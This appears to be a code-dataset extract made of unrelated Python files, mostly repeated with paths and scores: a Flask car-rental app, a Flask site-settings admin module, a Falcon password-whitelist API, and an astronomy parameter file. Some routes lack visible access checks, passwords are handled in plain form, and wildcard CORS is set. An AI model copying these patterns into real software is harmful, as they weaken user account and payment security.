latitude = request.form['latitude']
if mainEngine.editCarRegistrationValidation(registration_plate, car_id):
mainEngine.editCar(car_id, name, colour, description, capacity, registration_plate, fuel_type, transmission, type_, longitude, latitude, image)
return redirect("/admin/carlist")
success = False
return render_template("admin/editcar.html", car=car, success = success)
@app.route('/admin/userlist')
def userlist():
customers = mainEngine.getAllCustomers()
addresses = mainEngine.getAllAddresses()
licenses = mainEngine.getAllLicenses()
return render_template("admin/userlist.html", customers = customers, addresses = addresses, licenses = licenses)
@app.route('/register', methods = ('GET', 'POST'))
def register():
error = False
validDOB = True
validLicense = True
if request.method=='POST':
# personal details
fname = request.form['fname']
lname = request.form['lname']
dob = request.form['date']
phone = request.form['phone']
email = request.form['email']
password = request.form['password']
# address details
unit = request.form['unitno']
street = request.form['street']
suburb = request.form['suburb']
state = request.form['state']
postcode = request.form['postcode']
string_address = postcode + ", " + state
# license details
lnumber = request.form['lnumber']
country = request.form['country']
license_state = request.form['license-state']
issue_date = request.form['idate']
expiry_date = request.form['edate']
if mainEngine.check_duplicate_email(email) is False:
if mainEngine.validateDOB(dob) is True:
if mainEngine.validateLicenseDate(issue_date, expiry_date):
mainEngine.register(fname, lname, dob, email, password, phone)
cust_id = mainEngine.getCustomer(email)[0]
url = 'https://maps.googleapis.com/maps/api/geocode/json'
params = {'sensor': 'false', 'address': string_address, 'key': '<KEY>'}
r = requests.get(url, params=params)
results = r.json()['results']
location = results[0]['geometry']['location']
mainEngine.insertAddress(cust_id, unit, street, suburb, state, postcode, location['lat'], location['lng'])
mainEngine.insertLicense(cust_id, lnumber, country, license_state, issue_date, expiry_date)
return render_template("index.html", error = False, success = True, change = False)
else:
validLicense = False
else:
validDOB = False
else:
error = True
return render_template("register.html", error = error, validDOB = validDOB, validLicense = validLicense)
@app.route('/logout')
def logout():
session.clear()
return redirect("/")
@app.route('/customer/home')
def home():
return render_template("customer/home.html", email = session['email'])
@app.route('/customer/booking', methods = ('GET', 'POST'))
def booking():
valid = True
if request.method=='POST':
car_id = request.form['car']
start_date = request.form['sdate']
start_time = request.form['stime']
end_date = request.form['edate']
end_time = request.form['etime']
if mainEngine.validateBookingTime(start_date, start_time, end_date, end_time):
time = mainEngine.getTotalBookingTime(start_date, start_time, end_date, end_time)
cust = mainEngine.getCustomer(session['email'])
plan = cust[7]
cars = mainEngine.getCar(car_id)
cost = 0
if plan == 0:
cost = mainEngine.getTotalBookingCost(start_date, start_time, end_date, end_time, cars[0][10])
else:
cost = mainEngine.getTotalBookingCost(start_date, start_time, end_date, end_time, 15)
return render_template("customer/bookingPayment2.html", cars=cars, start_date=start_date, start_time=start_time, end_date=end_date, end_time=end_time, time=time, cost=cost, success=True)
else:
valid = False
cars = mainEngine.getAvalaibleCars()
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=-37.8136,
lng=144.9631,
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("customer/booking2.html", cars = cars, gmap = gmap, valid = valid)
@app.route('/customer/booking-summary', methods = ['POST'])
def booking_summary():
if request.method=='POST':
car_id = request.form['car']
start_date = request.form['sdate']
start_time = request.form['stime']
end_date = request.form['edate']
end_time = request.form['etime']
time = request.form['time']
cost = request.form['cost']
name = request.form['namecard']
card = request.form['cardnumber']
date = request.form['date']
cvv = request.form['cvv']
cust = mainEngine.getCustomer(session['email'])
if mainEngine.card_validation(name, card, date, cvv):
mainEngine.makeBooking(cust[0], car_id, start_date, start_time, end_date, end_time, time, cost)
mainEngine.setCarUnavalaible(car_id)
return redirect("/customer/ongoing-booking")
else:
cars = mainEngine.getCar(car_id)
return render_template("customer/bookingPayment2.html", cars=cars, start_date=start_date, start_time=start_time, end_date=end_date, end_time=end_time, time=time, cost=cost, success=False)
@app.route('/reset-password', methods = ('GET', 'POST'))
def reset():
invalid = False
diff = False
if request.method=='POST':
fname = request.form['fname']
lname = request.form['lname']
dob = request.form['date']
email = request.form['email']
password = request.form['pass']
confirm_password = request.form['<PASSWORD>']
cust_id = mainEngine.validateCustCredentials(email, fname, lname, dob)
if cust_id is not None:
if mainEngine.confirmPassword(password, confirm_password):
mainEngine.resetPassword(password, cust_id)
return render_template("index.html", error = False, success = False, change = True)
else:
diff = True
else:
invalid = True
return render_template("reset-1.html", invalid = invalid, diff = diff)
@app.route('/customer/ongoing-booking')
def ongoing_booking():
cust_id = mainEngine.getCustomer(session['email'])[0]
bookings = mainEngine.getPersonalOngoingBooking(cust_id)
cars = mainEngine.getAllCars()
return render_template("customer/ongoingBooking.html", bookings = bookings, cars = cars)
@app.route('/customer/booking-history')
def booking_history():
cust_id = mainEngine.getCustomer(session['email'])[0]
bookings = mainEngine.getPersonalBookingHistory(cust_id)
cars = mainEngine.getAllCars()
return render_template("customer/bookingHistory.html", bookings = bookings, cars = cars)
@app.route('/customer/search-car', methods = ('GET', 'POST'))
def search_car():
cars = {}
if request.method=='POST':
column = request.form['column']
search = request.form['search']
cars = mainEngine.searchCars(column, search)
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=-37.8136,
lng=144.9631,
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("/customer/searchCar.html", gmap=gmap, cars= cars)
@app.route('/customer/search-car-near-me', methods = ['POST'])
def search_car_by_location():
cust_id = mainEngine.getCustomer(session['email'])[0]
address = mainEngine.getAddress(cust_id)
car_list = mainEngine.getAvalaibleCars()
cars = mainEngine.distance(car_list, address)
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=address[7],
lng=address[8],
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("/customer/searchCar.html", gmap=gmap, cars= cars)
@app.route('/customer/plan')
def plan():
cust = mainEngine.getCustomer(session['email'])
plan = cust[7]
return render_template("/customer/price.html", plan = plan)
@app.route('/customer/set-plan')
def set_standard():
cust = mainEngine.getCustomer(session['email'])
mainEngine.set_plan(cust[7],cust[0])
return redirect("/customer/plan")
@app.route('/customer/cancel-booking', methods = ['POST'])
def cancel_booking():
booking_id = request.form['booking_id']
mainEngine.cancelBooking(booking_id)
booking = mainEngine.getBooking(booking_id)
mainEngine.setCarAvalaible(booking[0][2])
return redirect("/customer/ongoing-booking")
@app.route('/customer/complete-booking', methods = ['POST'])
def complete_booking():
booking_id = request.form['booking_id']
mainEngine.completeBooking(booking_id)
booking = mainEngine.getBooking(booking_id)
mainEngine.setCarAvalaible(booking[0][2])
return redirect("/customer/booking-history")
@app.route('/admin/delete-car', methods = ['POST'])
def delete_car():
car_id = request.form['car_id']
mainEngine.deleteCar(car_id)
return redirect("/admin/carlist")
@app.route('/customer/plan-summary', methods = ('GET', 'POST'))
def plan_summary():
cust = mainEngine.getCustomer(session['email'])
if request.method=='POST':
name = request.form['namecard']
card = request.form['cardnumber']
date = request.form['date']
cvv = request.form['cvv']
if mainEngine.card_validation(name, card, date, cvv):
mainEngine.set_premium_expiry(cust[0])
else:
return render_template("customer/planPayment2.html", success=False)
cust = mainEngine.getCustomer(session['email'])
if not cust[8] or not mainEngine.validate_premium(cust[8]):
return render_template("customer/planPayment2.html", success=True)
return redirect("/customer/set-plan") | 0.253584 | 0.043752 |
import os
from flask import current_app, request, flash, render_template, redirect, url_for, jsonify
from flask_login import login_required, current_user
from . import bpAdmin
from project.common.filePreprocess import allowedImage, creatFileName, allowedFileSize, removeFile
from project.common.dataPreprocess import strLength
@bpAdmin.route("/webSetting")
@login_required
def webSetting():
return render_template('admin/webSetting.html')
@bpAdmin.route("/setWebInfo", methods=['POST'])
@login_required
def setWebInfo():
webName = request.form['webName']
webIntro = request.form['webIntro']
webKeywords = request.form['webKeywords']
if not strLength(webName,1,32):
flash(u"网站名:最多16个汉字")
return redirect(url_for('admin.webSetting'))
if not strLength(webIntro,1,256):
flash(u"网站简介:最多128个汉字")
return redirect(url_for('admin.webSetting'))
if not strLength(webKeywords,1,128):
flash(u"网站关键词:最多64个汉字")
return redirect(url_for('admin.webSetting'))
current_user.custom['webName'] = webName
current_user.custom['webIntro'] = webIntro
current_user.custom['webKeywords'] = webKeywords
current_user.save()
flash(u"信息修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setWebLogo", methods=['POST'])
@login_required
def setWebLogo():
img = request.files.get('img')
if not allowedFileSize(len(img.read()),1):
flash(u"请上传小于1M的图片!")
return redirect(url_for('admin.webSetting'))
#文件read后,要重样把指针定位到开头
img.seek(0)
if img and allowedImage(img.filename):
try:
fileName = creatFileName(current_user.id, img.filename)
img.save(os.path.join(current_app.config['UPLOAD_PATH'], fileName))
if 'local/images/' not in current_user.custom['logo']:
#删除以前的图片
removeFile(os.path.join(current_app.config['STATIC_PATH'], current_user.custom['logo']))
current_user.custom['logo'] = current_app.config['UPLOAD_PATH_FOR_DB'] + '/' + fileName
current_user.save()
flash(u"logo修改成功!")
except:
flash(u"图片上传失败!")
else:
flash(u"请上传png/jpg/gif图片!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setWebFavicon", methods=['POST'])
@login_required
def setWebFavicon():
img = request.files.get('img')
if not allowedFileSize(len(img.read()),1):
flash(u"请上传小于1M的图片!")
return redirect(url_for('admin.webSetting'))
#文件read后,要重样把指针定位到开头
img.seek(0)
if img and allowedImage(img.filename):
try:
fileName = creatFileName(current_user.id, img.filename)
img.save(os.path.join(current_app.config['UPLOAD_PATH'], fileName))
if 'local/images/' not in current_user.custom['favicon']:
#删除以前的图片
removeFile(os.path.join(current_app.config['STATIC_PATH'], current_user.custom['favicon']))
current_user.custom['favicon'] = current_app.config['UPLOAD_PATH_FOR_DB'] + '/' + fileName
current_user.save()
flash(u"网站图标修改成功!")
except:
flash(u"图片上传失败!")
else:
flash(u"请上传png/jpg/gif图片!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setCopyright", methods=['POST'])
@login_required
def setCopyright():
copyright = request.form['copyright'].strip()
if not strLength(copyright,1,100):
flash(u"copyright最多100个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['copyright'] = copyright
current_user.save()
flash(u"copyright信息修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setStatisticalCode", methods=['POST'])
@login_required
def setStatisticalCode():
statisticalCode = request.form['statisticalCode'].strip()
if not strLength(statisticalCode,0,1000):
flash(u"统计代码最多1000个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['statisticalCode'] = statisticalCode
current_user.save()
flash(u"统计代码修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setCommentCode", methods=['POST'])
@login_required
def setCommentCode():
commentCode = request.form['commentCode'].strip()
if not strLength(commentCode,0,2000):
flash(u"评论代码最多2000个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['commentCode'] = commentCode
current_user.save()
flash(u"评论代码修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/webTemplate")
@bpAdmin.route("/webTemplate/<tpl>")
@login_required
def webTemplate(tpl=None):
themePath = os.path.join(current_app.config['BASE_DIR'], current_app.config['TPMPLATE_PATH'])
themes = os.listdir(themePath)
tpls = []
for h in themes:
tpls.append([h, '/%s/%s/%s' % (current_app.config['TPMPLATE_PATH'],h,'cover.jpg')])
if not tpl:
return render_template('admin/webTemplate.html',tpls=tpls)
elif tpl in themes:
current_user.custom['homeTemplate'] = 'theme/%s' % tpl
current_user.save()
flash(u'主题设置成功')
return redirect(url_for('admin.webTemplate')) | project/app/admin/webView.py |
import os
from flask import current_app, request, flash, render_template, redirect, url_for, jsonify
from flask_login import login_required, current_user
from . import bpAdmin
from project.common.filePreprocess import allowedImage, creatFileName, allowedFileSize, removeFile
from project.common.dataPreprocess import strLength
@bpAdmin.route("/webSetting")
@login_required
def webSetting():
return render_template('admin/webSetting.html')
@bpAdmin.route("/setWebInfo", methods=['POST'])
@login_required
def setWebInfo():
webName = request.form['webName']
webIntro = request.form['webIntro']
webKeywords = request.form['webKeywords']
if not strLength(webName,1,32):
flash(u"网站名:最多16个汉字")
return redirect(url_for('admin.webSetting'))
if not strLength(webIntro,1,256):
flash(u"网站简介:最多128个汉字")
return redirect(url_for('admin.webSetting'))
if not strLength(webKeywords,1,128):
flash(u"网站关键词:最多64个汉字")
return redirect(url_for('admin.webSetting'))
current_user.custom['webName'] = webName
current_user.custom['webIntro'] = webIntro
current_user.custom['webKeywords'] = webKeywords
current_user.save()
flash(u"信息修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setWebLogo", methods=['POST'])
@login_required
def setWebLogo():
img = request.files.get('img')
if not allowedFileSize(len(img.read()),1):
flash(u"请上传小于1M的图片!")
return redirect(url_for('admin.webSetting'))
#文件read后,要重样把指针定位到开头
img.seek(0)
if img and allowedImage(img.filename):
try:
fileName = creatFileName(current_user.id, img.filename)
img.save(os.path.join(current_app.config['UPLOAD_PATH'], fileName))
if 'local/images/' not in current_user.custom['logo']:
#删除以前的图片
removeFile(os.path.join(current_app.config['STATIC_PATH'], current_user.custom['logo']))
current_user.custom['logo'] = current_app.config['UPLOAD_PATH_FOR_DB'] + '/' + fileName
current_user.save()
flash(u"logo修改成功!")
except:
flash(u"图片上传失败!")
else:
flash(u"请上传png/jpg/gif图片!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setWebFavicon", methods=['POST'])
@login_required
def setWebFavicon():
img = request.files.get('img')
if not allowedFileSize(len(img.read()),1):
flash(u"请上传小于1M的图片!")
return redirect(url_for('admin.webSetting'))
#文件read后,要重样把指针定位到开头
img.seek(0)
if img and allowedImage(img.filename):
try:
fileName = creatFileName(current_user.id, img.filename)
img.save(os.path.join(current_app.config['UPLOAD_PATH'], fileName))
if 'local/images/' not in current_user.custom['favicon']:
#删除以前的图片
removeFile(os.path.join(current_app.config['STATIC_PATH'], current_user.custom['favicon']))
current_user.custom['favicon'] = current_app.config['UPLOAD_PATH_FOR_DB'] + '/' + fileName
current_user.save()
flash(u"网站图标修改成功!")
except:
flash(u"图片上传失败!")
else:
flash(u"请上传png/jpg/gif图片!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setCopyright", methods=['POST'])
@login_required
def setCopyright():
copyright = request.form['copyright'].strip()
if not strLength(copyright,1,100):
flash(u"copyright最多100个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['copyright'] = copyright
current_user.save()
flash(u"copyright信息修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setStatisticalCode", methods=['POST'])
@login_required
def setStatisticalCode():
statisticalCode = request.form['statisticalCode'].strip()
if not strLength(statisticalCode,0,1000):
flash(u"统计代码最多1000个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['statisticalCode'] = statisticalCode
current_user.save()
flash(u"统计代码修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setCommentCode", methods=['POST'])
@login_required
def setCommentCode():
commentCode = request.form['commentCode'].strip()
if not strLength(commentCode,0,2000):
flash(u"评论代码最多2000个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['commentCode'] = commentCode
current_user.save()
flash(u"评论代码修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/webTemplate")
@bpAdmin.route("/webTemplate/<tpl>")
@login_required
def webTemplate(tpl=None):
themePath = os.path.join(current_app.config['BASE_DIR'], current_app.config['TPMPLATE_PATH'])
themes = os.listdir(themePath)
tpls = []
for h in themes:
tpls.append([h, '/%s/%s/%s' % (current_app.config['TPMPLATE_PATH'],h,'cover.jpg')])
if not tpl:
return render_template('admin/webTemplate.html',tpls=tpls)
elif tpl in themes:
current_user.custom['homeTemplate'] = 'theme/%s' % tpl
current_user.save()
flash(u'主题设置成功')
return redirect(url_for('admin.webTemplate')) | 0.230573 | 0.040087 |
import json
import sqlite3
import time
import falcon
from base_shooting_stars_resource import BaseShootingStarsResource, hook_validate_auth
from constants import ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT, ERROR_MSG_DATA_VALIDATION_FAIL
master_pw_whitelist = set()
scout_pw_whitelist = set()
def hook_validate_scout_password(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
authorization = req.auth
if authorization not in scout_pw_whitelist and authorization not in master_pw_whitelist:
msg = ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
def hook_validate_master_password(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
authorization = req.auth
if authorization not in master_pw_whitelist:
msg = ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
def hook_validate_whitelist_params(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
msg = ERROR_MSG_DATA_VALIDATION_FAIL
if not isinstance(req.media.get('password', None), str):
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
class PasswordBasedShootingStarsResource:
def __init__(self, path_to_db: sqlite3.Connection):
self.shooting_stars_resource = BaseShootingStarsResource(path_to_db)
scout_pws = self.shooting_stars_resource.conn.execute('SELECT password FROM scout_whitelist').fetchall()
for scout in scout_pws:
scout_pw_whitelist.add(scout['password'])
master_pws = self.shooting_stars_resource.conn.execute('SELECT password FROM master_whitelist').fetchall()
for master in master_pws:
master_pw_whitelist.add(master['password'])
@falcon.before(hook_validate_master_password)
def on_get_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.text = json.dumps(list(scout_pw_whitelist.difference(master_pw_whitelist)))
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
@falcon.before(hook_validate_master_password)
@falcon.before(hook_validate_whitelist_params)
def on_post_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
pw = req.media['password'].strip()
scout_pw_whitelist.add(pw)
self.shooting_stars_resource.conn.execute("""
INSERT
INTO scout_whitelist
VALUES
(?)
""", [pw])
self.shooting_stars_resource.conn.commit()
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
@falcon.before(hook_validate_master_password)
@falcon.before(hook_validate_whitelist_params)
def on_delete_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
pw = req.media['password'].strip()
if pw in scout_pw_whitelist:
self.shooting_stars_resource.conn.execute("""
DELETE
FROM data
WHERE
sharedKey = ?
""", [pw])
self.shooting_stars_resource.conn.execute("""
DELETE
FROM scout_whitelist
WHERE
password = ?
""", [pw])
self.shooting_stars_resource.conn.commit()
scout_pw_whitelist.discard(pw)
resp.text = 'Successfully removed from whitelist and data cleared'
else:
resp.text = 'No such key found in the whitelist'
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
def on_options_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
resp.append_header('Access-Control-Allow-Headers', '*')
resp.append_header('Access-Control-Allow-Methods', '*')
return resp
@falcon.before(hook_validate_scout_password)
def on_post(self, req: falcon.request.Request, resp: falcon.response.Response):
return self.shooting_stars_resource.on_post(req, resp)
@falcon.before(hook_validate_auth)
def on_get(self, req: falcon.request.Request, resp: falcon.response.Response):
"""Handles GET requests"""
resp.status = falcon.HTTP_200 # This is the default status
# Get all current worlds for all keys.
lowest_time = int(time.time()) - (60*60)
highest_time = int(time.time()) + (60*150)
rows = self.shooting_stars_resource.conn.execute("""
SELECT location, world, MAX(minTime) as minTime, MIN(maxTime) as maxTime
FROM data
WHERE
maxTime > ? AND maxTime < ?
GROUP BY location, world
ORDER BY maxTime
""", [lowest_time, highest_time]).fetchall()
# Put data in json format
data_blob = []
for row in rows:
data = {
'location': row['location'],
'world': row['world'],
'minTime': row['minTime'],
'maxTime': row['maxTime']
}
data_blob.append(data)
resp.text = json.dumps(data_blob)
return resp
@falcon.before(hook_validate_master_password)
def on_get_separate(self, req: falcon.request.Request, resp: falcon.response.Response):
"""Handles GET requests"""
resp.status = falcon.HTTP_200 # This is the default status
# Get all current worlds for all keys.
lowest_time = int(time.time()) - (60*60)
highest_time = int(time.time()) + (60*150)
rows = self.shooting_stars_resource.conn.execute(f"""
SELECT location, world, minTime, maxTime, sharedKey
FROM data
WHERE
maxTime > ? AND maxTime < ?
ORDER BY world
""", [lowest_time, highest_time]).fetchall()
# Put data in json format
data_blob = []
for row in rows:
data = {
'location': row['location'],
'world': row['world'],
'minTime': row['minTime'],
'maxTime': row['maxTime'],
'password': (row['sharedKey'] if row['sharedKey'] not in master_pw_whitelist else 'MASTER PASSWORD')
}
data_blob.append(data)
resp.text = json.dumps(data_blob)
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
def on_options_separate(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
resp.append_header('Access-Control-Allow-Headers', '*')
resp.append_header('Access-Control-Allow-Methods', '*')
return resp | password_based_shooting_stars_resource.py | import json
import sqlite3
import time
import falcon
from base_shooting_stars_resource import BaseShootingStarsResource, hook_validate_auth
from constants import ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT, ERROR_MSG_DATA_VALIDATION_FAIL
master_pw_whitelist = set()
scout_pw_whitelist = set()
def hook_validate_scout_password(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
authorization = req.auth
if authorization not in scout_pw_whitelist and authorization not in master_pw_whitelist:
msg = ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
def hook_validate_master_password(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
authorization = req.auth
if authorization not in master_pw_whitelist:
msg = ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
def hook_validate_whitelist_params(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
msg = ERROR_MSG_DATA_VALIDATION_FAIL
if not isinstance(req.media.get('password', None), str):
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
class PasswordBasedShootingStarsResource:
def __init__(self, path_to_db: sqlite3.Connection):
self.shooting_stars_resource = BaseShootingStarsResource(path_to_db)
scout_pws = self.shooting_stars_resource.conn.execute('SELECT password FROM scout_whitelist').fetchall()
for scout in scout_pws:
scout_pw_whitelist.add(scout['password'])
master_pws = self.shooting_stars_resource.conn.execute('SELECT password FROM master_whitelist').fetchall()
for master in master_pws:
master_pw_whitelist.add(master['password'])
@falcon.before(hook_validate_master_password)
def on_get_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.text = json.dumps(list(scout_pw_whitelist.difference(master_pw_whitelist)))
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
@falcon.before(hook_validate_master_password)
@falcon.before(hook_validate_whitelist_params)
def on_post_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
pw = req.media['password'].strip()
scout_pw_whitelist.add(pw)
self.shooting_stars_resource.conn.execute("""
INSERT
INTO scout_whitelist
VALUES
(?)
""", [pw])
self.shooting_stars_resource.conn.commit()
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
@falcon.before(hook_validate_master_password)
@falcon.before(hook_validate_whitelist_params)
def on_delete_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
pw = req.media['password'].strip()
if pw in scout_pw_whitelist:
self.shooting_stars_resource.conn.execute("""
DELETE
FROM data
WHERE
sharedKey = ?
""", [pw])
self.shooting_stars_resource.conn.execute("""
DELETE
FROM scout_whitelist
WHERE
password = ?
""", [pw])
self.shooting_stars_resource.conn.commit()
scout_pw_whitelist.discard(pw)
resp.text = 'Successfully removed from whitelist and data cleared'
else:
resp.text = 'No such key found in the whitelist'
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
def on_options_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
resp.append_header('Access-Control-Allow-Headers', '*')
resp.append_header('Access-Control-Allow-Methods', '*')
return resp
@falcon.before(hook_validate_scout_password)
def on_post(self, req: falcon.request.Request, resp: falcon.response.Response):
return self.shooting_stars_resource.on_post(req, resp)
@falcon.before(hook_validate_auth)
def on_get(self, req: falcon.request.Request, resp: falcon.response.Response):
"""Handles GET requests"""
resp.status = falcon.HTTP_200 # This is the default status
# Get all current worlds for all keys.
lowest_time = int(time.time()) - (60*60)
highest_time = int(time.time()) + (60*150)
rows = self.shooting_stars_resource.conn.execute("""
SELECT location, world, MAX(minTime) as minTime, MIN(maxTime) as maxTime
FROM data
WHERE
maxTime > ? AND maxTime < ?
GROUP BY location, world
ORDER BY maxTime
""", [lowest_time, highest_time]).fetchall()
# Put data in json format
data_blob = []
for row in rows:
data = {
'location': row['location'],
'world': row['world'],
'minTime': row['minTime'],
'maxTime': row['maxTime']
}
data_blob.append(data)
resp.text = json.dumps(data_blob)
return resp
@falcon.before(hook_validate_master_password)
def on_get_separate(self, req: falcon.request.Request, resp: falcon.response.Response):
"""Handles GET requests"""
resp.status = falcon.HTTP_200 # This is the default status
# Get all current worlds for all keys.
lowest_time = int(time.time()) - (60*60)
highest_time = int(time.time()) + (60*150)
rows = self.shooting_stars_resource.conn.execute(f"""
SELECT location, world, minTime, maxTime, sharedKey
FROM data
WHERE
maxTime > ? AND maxTime < ?
ORDER BY world
""", [lowest_time, highest_time]).fetchall()
# Put data in json format
data_blob = []
for row in rows:
data = {
'location': row['location'],
'world': row['world'],
'minTime': row['minTime'],
'maxTime': row['maxTime'],
'password': (row['sharedKey'] if row['sharedKey'] not in master_pw_whitelist else 'MASTER PASSWORD')
}
data_blob.append(data)
resp.text = json.dumps(data_blob)
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
def on_options_separate(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
resp.append_header('Access-Control-Allow-Headers', '*')
resp.append_header('Access-Control-Allow-Methods', '*')
return resp | 0.393968 | 0.078008 |
### DON NOT FORGET TO MODIFY idlib
import os
verbose = False
src = 'M83'
Nmc = 60
## Current dir
##-------------
path_cur = os.getcwd()+'/'
path_par = os.path.dirname(os.path.abspath(__file__))+'/' # param file path
## IDL dir
##---------
path_idl = path_par+'idlib/'
## Root dir
##----------
## Root of data and outputs
path_root = '/Users/dhu/Data/'
## Data dir
path_irs = path_root+'Spitzer/data/'+src+'/'
path_phot = path_root+'Photometry/'+src+'/'
path_ker = path_root+'Kernels/'
## IRS data (via CUBISM)
##-----------------------
fits_sl2 = []
fits_sl3 = []
fits_sl1 = []
fits_ll2 = []
fits_ll3 = []
fits_ll1 = []
fits_irs = []
Nch = 4 # Number of chnl (ordered as below) used
chnl = ['SL2', 'SL3', 'SL1', 'LL2', 'LL3', 'LL1']
# lab_sl = ['_04', '_06', '_08', '_09'] # M82
# lab_ll = ['_04', '_05', '_06', '_08', '_09'] # M82
lab_sl = ['']
lab_ll = ['']
for i, ch in enumerate(chnl):
## SL
if i//3==0:
for t in lab_sl:
f = path_irs+src+t+'_'+ch
if ch=='SL2':
fits_sl2.append(f)
if ch=='SL3':
fits_sl3.append(f)
if ch=='SL1':
fits_sl1.append(f)
## LL
else:
for t in lab_ll:
f = path_irs+src+t+'_'+ch
if ch=='LL2':
fits_ll2.append(f)
if ch=='LL3':
fits_ll3.append(f)
if ch=='LL1':
fits_ll1.append(f)
fits_irs.append(fits_sl2)
fits_irs.append(fits_sl3)
fits_irs.append(fits_sl1)
fits_irs.append(fits_ll2)
fits_irs.append(fits_ll3)
fits_irs.append(fits_ll1)
## Convolution
##-------------
fits_ker = []
psf = [2., 2.5, 3., 3.5, 4., 4.5, 5., 5.5, 6.]
# psf_ref = 'IRAC_5.8' # 2.11 (< LL1)
# psf_ref = 'IRAC_8.0'# 2.82 (< LL1)
psf_ref = 'Gauss_06.0'
# psf_ref = 'MIPS_24' # 6.43"
# psf_ref = 'WISE_MAP_11.6' # 6.60"
# psf_ref = 'WISE_MAP_22.1' # 11.89"
for p in psf:
fits_ker.append(path_ker+'Kernel_HiRes_Gauss_0'+
str(p)+'_to_'+psf_ref)
## Tmp files
##-----------
path_tmp = path_root+'PAHPedia/tmp/'
if not os.path.exists(path_tmp):
os.makedirs(path_tmp)
path_conv = path_tmp+'conv/' # idlib/convolve_image.pro
if not os.path.exists(path_conv):
os.makedirs(path_conv)
csv_ker = path_tmp+'kernelist' # idlib/conv_prog.pro
## Outputs
##---------
path_out = path_root+'PAHPedia/'+src+'/' # idlib/conv_prog.pro
## Calibrations
phot = 'IRAC4' # photometry filter
path_cal = path_out+'calib/'
if not os.path.exists(path_cal):
os.makedirs(path_cal)
## Tests
##-------
path_tests = path_root+'PAHPedia/tests/' | MIRAGE/arx/v0_2/param_irs_M83.py |
### DON NOT FORGET TO MODIFY idlib
import os
verbose = False
src = 'M83'
Nmc = 60
## Current dir
##-------------
path_cur = os.getcwd()+'/'
path_par = os.path.dirname(os.path.abspath(__file__))+'/' # param file path
## IDL dir
##---------
path_idl = path_par+'idlib/'
## Root dir
##----------
## Root of data and outputs
path_root = '/Users/dhu/Data/'
## Data dir
path_irs = path_root+'Spitzer/data/'+src+'/'
path_phot = path_root+'Photometry/'+src+'/'
path_ker = path_root+'Kernels/'
